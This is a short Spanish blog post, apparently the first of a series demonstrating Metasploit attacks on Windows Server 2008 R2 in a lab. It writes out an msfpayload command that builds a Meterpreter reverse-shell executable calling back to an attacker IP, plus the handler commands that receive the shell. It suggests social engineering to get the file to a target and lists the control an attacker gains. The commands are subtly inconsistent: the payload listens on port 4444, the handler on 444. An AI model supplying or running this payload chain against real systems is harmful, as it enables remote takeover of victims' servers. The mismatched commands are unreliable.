Gracias
a C0lds0ft tendremos en el blog una serie de entradas con la que se pretende
demostrar varias técnicas de Hacking con Metasploit en Windows Server 2008 R2
SP1.
Shell Reversa
Este primer video contiene una técnica conocida llamada conexión en reversa (shell reverse), realizado mediante la generación de un archivo ejecutable con la herramienta msfpayload.
En
esta demostración con fines educativos se observa un Windows Server 2008 R2 SP1 con IP 192.168.1.39
corriendo sobre un entorno virtualizado del servicio Hyper-V Virtualization y
la conexión al equipo atacante mediante Putty (192.168.1.254) donde previamente
se construye el archivo .exe, llamado C0lds0ft.exe:
msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=4444 X
>/root/Escritorio/C0lds0ft.exe
Con
este archivo generamos la conexión en reversa desde la víctima, y aquí el
ingenio y las
técnicas de ingeniería social que se utilice para hacerlo llegar al Target son
las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas.
Posterior a enviado se procede a poner a la escucha así:
Posterior a enviado se procede a poner a la escucha así:
use exploit/multi/handler
set PAYLOAD
windows/meterpreter/reverse_tcp
set LHOST
192.168.1.254
set LPORT
444
exploit
De
esta manera cuando la víctima ejecuta el archivo .exe nos da una conexión Meterpreter
en reversa, obteniendo total acceso a la maquina. Con esta conexión podría el
administrador perder el control del servidor, puesto que entre otras se puede crear
usuarios, activar escritorio remoto, descargar archivos, subir archivos, publicar
páginas web, modificar IIS, crear DDOS, Phishing, etc.
Archivo .PDF Malicioso
En
esta parte se mostrara la forma de generar una shell en reversa mediante el
envenenamiento de un archivo PDF sobre windows server 2008. El
procedimiento se realiza como se evidencia en los siguientes vídeos.
Primera Parte
Segunda Parte